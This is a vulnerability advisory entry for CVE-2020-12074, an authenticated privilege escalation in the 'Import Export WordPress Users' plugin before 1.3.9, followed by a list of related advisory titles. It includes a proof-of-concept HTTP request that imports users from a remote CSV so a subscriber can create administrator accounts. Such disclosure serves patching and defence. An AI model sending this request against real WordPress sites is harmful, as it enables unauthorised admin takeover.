Import Export WordPress Users < 1.3.9 – Authenticated Arbitrary User Creation | CVE 2020-12074 | Plugin Vulnerabilities

Description

"The flaw allowed anybody with subscriber-level access or above to import new users via a CSV file, including administrative-level users" providing subscriber-level users and above with the ability to escalate their privileges.

Proof of Concept

POST /wp-admin/admin-ajax.php?import_page=wordpress_hf_user_csv&step=3 HTTP/1.1
Host: EXAMPLE.com
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36
Origin: http://EXAMPLE.com
Referer: http://EXAMPLE.com/wp-admin/admin.php?import=wordpress_hf_user_csv&step=2
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: {SUB+ COOKIES}
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 133

action=user_csv_import_request&file=http://REMOTESITE.com/USERS.csv&start_pos=0&end_pos=

PoC video: https://www.youtube.com/watch?v=0ejJwbFJpcU

Affects Plugins

users-customers-import-export-for-wp-woocommerce

Fixed in 1.3.9

References

CVE

URL

https://www.wordfence.com/blog/2020/03/vulnerability-patched-in-import-export-wordpress-users/

URL

https://plugins.trac.wordpress.org/changeset/2252948/users-customers-import-export-for-wp-woocommerce

Classification

Type

PRIVESC

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Chloe Chamberland

Submitter

Chloe Chamberland

Submitter website

https://www.wordfence.com/

Submitter twitter

Verified

No

WPVDB ID

b7c5e0f3-3d29-49ce-b93e-fcae6b6e62a6

Timeline

Publicly Published

2020-03-11 (about 6 years ago)

Added

2020-03-11 (about 6 years ago)

Last Updated

2020-04-24 (about 6 years ago)

Other

Published

Title

Published

2023-08-03

Title

WP Ultimate CSV Importer < 7.9.9 - Author+ Privilege Escalation

Published

2025-12-01

Title

ELEX WordPress HelpDesk & Customer Ticketing System < 3.3.3 - Authenticated (Contributor+) Privilege Escalation via eh_crm_edit_agent AJAX Action

Published

2026-06-16

Title

Registration Form for WooCommerce < 1.1.0 - Unauthenticated Privilege Escalation

Published

2025-05-19

Title

Motors < 5.6.68 - Unauthenticated Privilege Escalation via Password Update/Account Takeover

Published

2025-10-21

Title

King Addons for Elementor < 51.1.37 - Unauthenticated Privilege Escalation